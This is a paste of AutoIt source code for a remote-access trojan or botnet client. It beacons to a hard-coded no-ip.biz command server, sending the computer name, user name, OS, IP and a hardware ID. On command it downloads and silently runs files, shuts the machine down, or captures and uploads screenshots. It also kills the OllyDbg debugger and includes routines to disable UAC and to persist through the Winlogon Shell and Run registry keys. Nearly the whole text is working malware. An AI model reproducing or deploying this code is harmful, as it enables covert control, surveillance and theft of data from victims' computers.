SHOW:
|
|
- or go back to the newest paste.
1 | #NoTrayIcon | |
2 | ;#RequireAdmin | |
3 | #include <File.au3> | |
4 | #include <Misc.au3> | |
5 | #include <string.au3> | |
6 | #include <crypt.au3> | |
7 | #include <ScreenCapture.au3> | |
8 | ||
9 | ;Mutex | |
10 | ;------ | |
11 | ||
12 | ;Singleton("7563545689855477") | |
13 | ||
14 | ;HWID | |
15 | ;------ | |
16 | ||
17 | Global $hwid = id() | |
18 | ||
19 | ;disable uac | |
20 | ;------ | |
21 | ||
22 | if IsAdmin() Then | |
23 | ;_Disable_UAC() | |
24 | EndIf | |
25 | ||
26 | ;SETTING VARIABLES | |
27 | ;------ | |
28 | $mainHome = "http://jlibs8080.no-ip.biz" ;main domain | |
29 | $mainDir = "/bnt2/" | |
30 | $upshot = $mainHome & $mainDir & "u.php" ;path to upload file | |
31 | $serverHome = $mainHome & $mainDir & "s.php" ;path to server file | |
32 | $cmdDir = $mainHome & $mainDir & "dir.php" ;path to commandDir file | |
33 | ||
34 | ;------above = url[/]------below = local path[\]------ | |
35 | $subDir = "\n0625d6982e9krf824\" | |
36 | $filei = "\jhgr78.log" ;update log - make random VIA builder | |
37 | ||
38 | ;------ | |
39 | $interv = 5 | |
40 | $counter = $interv * 1000 * 60 ;15 minutes | |
41 | ;------ | |
42 | ||
43 | $timeInit = TimerInit() | |
44 | Global $result | |
45 | Global $ip = @IPAddress1 | |
46 | ;Do On Start Up | |
47 | ;------ | |
48 | ||
49 | ;FileMove(@ScriptFullPath, @TempDir & $subDir & "hvn.exe", 9) | |
50 | ||
51 | if(FileExists(@TempDir & $subDir) <> 1) Then | |
52 | DirCreate(@TempDir & $subDir) | |
53 | EndIf | |
54 | ||
55 | ;$reg = RegWrite('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', @ScriptName, 'REG_SZ', @TempDir & $subDir & 'hvn.exe') | |
56 | ;_Run(@ScriptFullPath) | |
57 | ||
58 | ;Anti Debugger | |
59 | ;------ | |
60 | ||
61 | $process = "OLLYDBG.EXE" | |
62 | ||
63 | If ProcessExists($process) Then | |
64 | ProcessClose($process) | |
65 | EndIf | |
66 | ||
67 | ;Initial update | |
68 | ;------ | |
69 | ||
70 | _Update($filei) | |
71 | ||
72 | ;UPDATE | |
73 | ;------ | |
74 | While 1 | |
75 | While 1 | |
76 | ||
77 | $updateTime = TimerDiff($timeInit) | |
78 | ||
79 | if $updateTime > $counter Then | |
80 | ;ConsoleWrite("test") | |
81 | ;$command = InetRead($cmdDir,1) | |
82 | $Command = _Update($filei) | |
83 | ||
84 | if $command == "-1" Or StringLeft($command,3) == "<br" Then | |
85 | ||
86 | $interv = Random(5,30,1) | |
87 | $counter = $interv * 1000 * 60 | |
88 | $timeInit = TimerInit() | |
89 | ExitLoop | |
90 | ||
91 | EndIf | |
92 | ||
93 | $process = BinaryToString($command) | |
94 | $comS = StringSplit($process,"|") | |
95 | $uComs = UBound($comS) - 1 | |
96 | Global $commandVal[$uComs+1][10] | |
97 | ||
98 | for $j = 1 to $uComs | |
99 | ||
100 | $cMas = StringSplit($comS[$j],",") | |
101 | $uCmas = UBound($cMas) - 1 | |
102 | ||
103 | for $l = 1 to $uCmas | |
104 | ||
105 | $commandVal[$j][$l] = $cMas[$l] | |
106 | ||
107 | Next | |
108 | Next | |
109 | ||
110 | $uCommandVal = UBound($commandVal)-1 | |
111 | ||
112 | for $j = 1 to $uCommandVal | |
113 | ||
114 | Switch $commandval[$j][1] | |
115 | ||
116 | Case 1 | |
117 | ||
118 | _DlnEx($commandval[$j][2],$commandval[$j][3],1,1,$commandval[$j][4]) ;DL n EX | |
119 | ||
120 | Case 2 | |
121 | ||
122 | _DlnEx($commandval[$j][2],$commandval[$j][3],1) ;DL | |
123 | ||
124 | Case 3 | |
125 | ||
126 | _DlnEx("",$commandval[$j][3],0,1,$commandval[$j][4]) | |
127 | ||
128 | Case 4 | |
129 | ||
130 | ;haha($commandval[$j][1]) | |
131 | Shutdown(6) | |
132 | ||
133 | Case 5 | |
134 | ||
135 | $scrnName = Random(12,999999,1) & ".jpg" | |
136 | _ScreenCapture_Capture(@ScriptDir & "\" & $scrnName) | |
137 | ScrnUp($scrnName) | |
138 | FileDelete(@ScriptDir & "\" & "*.jpg") | |
139 | ||
140 | EndSwitch | |
141 | ||
142 | Next | |
143 | ||
144 | ;//////---end of update---////// | |
145 | ;reset time | |
146 | ;------ | |
147 | ||
148 | ;$interv = Random(5,30,1) | |
149 | ;$counter = $interv * 1000 * 60 | |
150 | Sleep(500) | |
151 | $timeInit = TimerInit() | |
152 | EndIf | |
153 | ||
154 | Sleep(50) | |
155 | ||
156 | WEnd | |
157 | WEnd | |
158 | ;//////---Functions---////// | |
159 | ||
160 | ;------ | |
161 | ;HWID | |
162 | ||
163 | func id() | |
164 | $disc = StringLeft(@SystemDir, 3) | |
165 | $start = "0" & @CPUArch & @KBLayout & DriveGetSerial("C:\") & StringUpper(DriveGetType($disc)) & DriveSpaceTotal ($disc) | |
166 | $hwid1 = StringMid($start, Round(StringLen($start)/2), Round(StringLen($start)/2)) | |
167 | $hwid2 = _StringToHex(stringReverse($hwid1)) | |
168 | $final = $start & $hwid2 | |
169 | $start = _Crypt_HashData($Final,$CALG_MD5) | |
170 | $epicFinal = StringMid($start,1,8) & ":" & StringMid($start,8,16) | |
171 | ||
172 | Return StringSplit($epicFinal, ":") | |
173 | EndFunc | |
174 | ||
175 | ;------ | |
176 | ;MUTEX | |
177 | ||
178 | Func Singleton($semaphore) | |
179 | Local $ERROR_ALREADY_EXISTS = 183 | |
180 | DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $semaphore) | |
181 | Local $lastError = DllCall("kernel32.dll", "int", "GetLastError") | |
182 | If $lastError[0] = $ERROR_ALREADY_EXISTS Then Exit -1 | |
183 | EndFunc | |
184 | ||
185 | ;------ | |
186 | ;Disable UAC | |
187 | ||
188 | Func _Disable_UAC() | |
189 | If @OSArch = "X64" Then | |
190 | $pref = "64" | |
191 | Else | |
192 | $pref = "" | |
193 | EndIf | |
194 | $r1 = RegWrite("HKLM" & $pref & "\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" ,"ConsentPromptBehaviorAdmin", "REG_DWORD", "0") | |
195 | $r2 = RegWrite("HKLM" & $pref & "\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" ,"EnableLUA", "REG_DWORD", "0") | |
196 | Sleep(500) | |
197 | If $r1 + $r2 = 2 Then | |
198 | Return True | |
199 | Else | |
200 | Return False | |
201 | EndIf | |
202 | EndFunc | |
203 | ||
204 | ;------ | |
205 | ;StartUp | |
206 | ||
207 | Func _run($file, $type = 1) | |
208 | $ret = False | |
209 | $arun = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell") | |
210 | if StringInStr($arun, @ScriptName) = 0 Then | |
211 | $name = @ScriptName | |
212 | FileCopy($file, @WindowsDir & "\" & $name, 1) | |
213 | $ret = RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", $arun & "," & $name) | |
214 | EndIf | |
215 | Return $ret | |
216 | EndFunc | |
217 | ||
218 | ;------ | |
219 | ;update | |
220 | ||
221 | Func _Update($updateFile) | |
222 | ||
223 | Global $ip = @IPAddress1 | |
224 | $compName = @ComputerName | |
225 | $os = @OSVersion | |
226 | $userName = @UserName | |
227 | $Name = $hWID[1] | |
228 | $password = $hwid[2] | |
229 | ||
230 | $memStats = MemGetStats() | |
231 | ||
232 | _FileWriteLog(@TempDir & $updateFile, "Percent memery usage - " & $memStats[0] & " # ") | |
233 | ||
234 | $infoz = FileOpen(@TempDir & $updateFile) | |
235 | $infozz = FileRead($infoz) | |
236 | ||
237 | $serverdata = '&username=' & $name & '&password=' & $password & '&os=' & $os & '&oigh=' & $infozz & '&ip=' & $ip & '&name=' & $userName & '&compName=' & $compName | |
238 | $oHTTP = ObjCreate("winhttp.winhttprequest.5.1") | |
239 | $oHTTP.Open("POST", $serverHome, False) | |
240 | $oHTTP.SetRequestHeader("Content-Type","application/x-www-form-urlencoded") | |
241 | $oHTTP.Send($serverdata) | |
242 | $oReceived = $oHTTP.ResponseText | |
243 | FileClose($infoz) | |
244 | ||
245 | ConsoleWrite($oReceived & @CRLF) | |
246 | ||
247 | FileDelete(@TempDir & $updateFile) | |
248 | Return $oReceived | |
249 | ;Exit | |
250 | EndFunc | |
251 | ||
252 | ;------ | |
253 | ;DL n EX | |
254 | ||
255 | Func _DlnEx($DlURL="",$DlFileName="",$DwnL = 0,$DlnEx = 0,$exeParams="") | |
256 | ||
257 | $result = "" | |
258 | ||
259 | If $Dwnl == 1 Then | |
260 | $dlget = InetGet($DlURL,@TempDir & $subDir & $DlFileName) | |
261 | InetClose($dlget) | |
262 | ||
263 | If $dlget <> 0 Then | |
264 | $result &= "dl-succ-" & $DlFileName | |
265 | Else | |
266 | $result &= "dl-error-fail-" & $DlFileName | |
267 | EndIf | |
268 | EndIf | |
269 | ||
270 | If $DlnEx == 1 Then | |
271 | ||
272 | ShellExecute($DlFileName,$exeParams,@TempDir & $subDir,"open",@SW_HIDE) | |
273 | Sleep(500) | |
274 | ||
275 | $dlNexPrcExs = ProcessExists($DlFileName) | |
276 | ||
277 | If $dlNexPrcExs <> 0 Then | |
278 | $result &= "-exe-true-" & $DlFileName & "-pid=" & $dlNexPrcExs & "-" | |
279 | Else | |
280 | $result &= "-exe-FAIL-To-Start-" & $DlFileName | |
281 | EndIf | |
282 | ||
283 | EndIf | |
284 | ||
285 | _FileWriteLog(@TempDir & $filei, $result) | |
286 | ||
287 | EndFunc | |
288 | ||
289 | ;------ | |
290 | ;upload scrnshot | |
291 | ||
292 | Func ScrnUp($scrnFile) | |
293 | ||
294 | Local $picOpen = FileOpen(@ScriptDir & "\" & $scrnFile,16) | |
295 | Local $picRead = FileRead($picOpen) | |
296 | Local $boundary = "a65h7a" & @CRLF | |
297 | Local $boundary2 = "--" & $boundary | |
298 | Local $binary = "Content-Transfer-Encoding: binary" & @CRLF | |
299 | local $typeCon = "Content-Type: txt/html" & @CRLF & @CRLF | |
300 | ||
301 | Local $postData = $boundary2 | |
302 | ||
303 | $postData &= 'Content-Disposition: form-data; name="file[]"; filename="' & $hwid[2] & '"' & @CRLF | |
304 | $postData &= $typeCon | |
305 | $postData &= $picRead & @CRLF | |
306 | $postData &= "--a65h7a--";End of HTTP HEADER | |
307 | ||
308 | $oHTTP = ObjCreate("winhttp.winhttprequest.5.1") | |
309 | $oHTTP.Open("POST", $upshot, False) | |
310 | $oHTTP.SetRequestHeader("Content-Type", "multipart/form-data; boundary=" & $boundary) | |
311 | $oHTTP.Send($postData) | |
312 | $oReceived = $oHTTP.ResponseText | |
313 | ||
314 | FileClose($picOpen) | |
315 | ||
316 | EndFunc | |
317 | ;------ | |
318 | ;debug Purpuses | |
319 | func haha($var) | |
320 | ||
321 | ConsoleWrite("haha it worked" & @CRLF) | |
322 | ConsoleWrite($var & @CRLF) | |
323 | ||
324 | EndFunc |